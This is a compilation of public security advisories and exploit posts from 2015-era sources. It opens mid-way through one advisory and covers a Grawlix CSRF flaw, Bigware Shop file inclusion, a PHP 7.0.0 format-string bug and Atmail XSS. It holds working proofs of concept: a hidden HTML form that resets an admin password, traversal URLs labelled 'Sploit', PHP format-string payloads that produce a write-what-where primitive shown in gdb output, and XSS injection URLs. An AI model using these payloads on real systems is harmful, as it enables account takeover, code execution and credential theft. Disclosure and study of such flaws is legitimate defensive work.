12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/17/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Arastta-115-SQL-Injection-131.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Grawlix 1.0.3
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://www.getgrawlix.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 12/21/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

Grawlix is a CMS for publishing comics, which is written in PHP. In version
1.0.3, it does not have CSRF protection, which means that an attacker can
perform actions for a victim, if the victim visits an attacker controlled site
while logged in.

An attacker can for example change the password of an existing admin account,
which may in turn lead to code execution via a different vulnerability in the
admin area.

3. Proof of Concept

Change admin password:


<html>
  <body>
    <form action="http://localhost/grawlix-1.0.3/grawlix-1.0.3/_admin/user.config.php" method="POST">
      <input type="hidden" name="username[1]" value="admin" />
      <input type="hidden" name="email[1]" value="admin@example.com" />
      <input type="hidden" name="password[1]" value="admin" />
      <input type="hidden" name="confirm_password[1]" value="admin" />
      <input type="hidden" name="submit" value="save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-CSRF-128.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
HireHackking 
# Title: Bigware Shop 2.3.01 Multiple Local File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Vendor: http://www.bigware.de
# Download: http://www.bigware.de/download/bigware_software_-_vollversion/Bigware_Shop.zip


Proof-of-Concept1:

/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58
**********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
**********************************************************************

[+]Sploit1: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Proof-of-Concept2: 

/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56
*********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
********************************************************************* 

[+]Sploit: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php


=> Vuln-Description: The $language-parameter isn't declared. So an attacker can readin'.
=> Vendor-Solution: Please declare this parameter before require. 



***Greetings fr0m Germany: zone-h.org-Team, exploit-db.com, GoLd_M, Kim Dotcom***

MERRY CHRISTMAS BRO'S! :)
HireHackking 
Overview
--------------------------------------------
A fun little format string vulnerability exists in PHP 7.0.0 due to how 
non-existent class names are handled.  From my limited research I 
believe this issue is likely exploitable for full code execution (see 
test script below).  This issue does not appear to be present in 
previous PHP versions and has been patched in version 7.0.1.  If you 
build a working exploit, drop me a line, I'd love to see (andrew at 
jmpesp dot org).  Shout out to the PHP team for fixing this so quickly 
and for building a great product.  Greetz to my DSU crew.



Timeline
--------------------------------------------
12/11/2015: Discovered
12/12/2015: Reported to PHP team
12/13/2015: Patch accepted and committed
12/17/2015: PHP 7.0.1 released containing patch
12/22/2015: Publicly disclosed



Vulnerability/Patch
--------------------------------------------
diff -rup php-7.0.0_old/Zend/zend_execute_API.c 
php-7.0.0_new/Zend/zend_execute_API.c
--- php-7.0.0_old/Zend/zend_execute_API.c	2015-12-01 07:36:25.000000000 
-0600
+++ php-7.0.0_new/Zend/zend_execute_API.c	2015-12-12 12:24:24.999391117 
-0600
@@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc
  	zend_vspprintf(&message, 0, format, va);

  	if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) {
-		zend_throw_error(exception_ce, message);
+		zend_throw_error(exception_ce, "%s", message);
  	} else {
  		zend_error(E_ERROR, "%s", message);
  	}



Proof of Concept #1 (simple segfault)
--------------------------------------------
<?php $name="%n%n%n%n%n"; $name::doSomething(); ?>



Proof of Concept #2 (write-what-where primitive)
--------------------------------------------
andrew@thinkpad /tmp/php-7.0.0_64 % cat /tmp/test.php
<?php
ini_set("memory_limit", "4G"); // there's probably a much cleaner way to 
do this
$rdx = 0x42424242; // what
$rax = 0x43434343; // where
$name = "%" . ($rdx - 8) . "d" . "%d" . "%n" . str_repeat("A", ($rax - 
34)); // your offsets may differ.
$name::doSomething();
?>

andrew@thinkpad /tmp/php-7.0.0_64 % gdb sapi/cli/php
GNU gdb (GDB) 7.10
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show 
copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from sapi/cli/php...done.
(gdb) r /tmp/test.php
Starting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x0000000000672935 in xbuf_format_converter 
(xbuf=xbuf@entry=0x7fffffffa610, is_char=is_char@entry=1 '\001', 
fmt=<optimized out>, ap=0x7fffffffa658)
     at /tmp/php-7.0.0_64/main/spprintf.c:744
744						*(va_arg(ap, int *)) = is_char? (int)((smart_string 
*)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s);
(gdb) i r
rax            0x43434343	1128481603
rbx            0x7fffb2800016	140736188121110
rcx            0x6e	110
rdx            0x42424242	1111638594
rsi            0x7fffffff9db0	140737488330160
rdi            0x7fffffffa658	140737488332376
rbp            0x1	0x1
rsp            0x7fffffff9d50	0x7fffffff9d50
r8             0x7fffffff9db0	140737488330160
r9             0x7fffb2800016	140736188121110
r10            0x0	0
r11            0x0	0
r12            0x20	32
r13            0x7fffffffa610	140737488332304
r14            0x0	0
r15            0x4242423a	1111638586
rip            0x672935	0x672935 <xbuf_format_converter+1845>
eflags         0x10202	[ IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) x/1i $rip
=> 0x672935 <xbuf_format_converter+1845>:	mov    DWORD PTR [rax],edx
(gdb)
HireHackking 
source: https://www.securityfocus.com/bid/65408/info
  
Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
  
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  
Atmail 7.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B%5D=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/65408/info
 
Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 
Atmail 7.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/65408/info

Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Atmail 7.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/[XSS]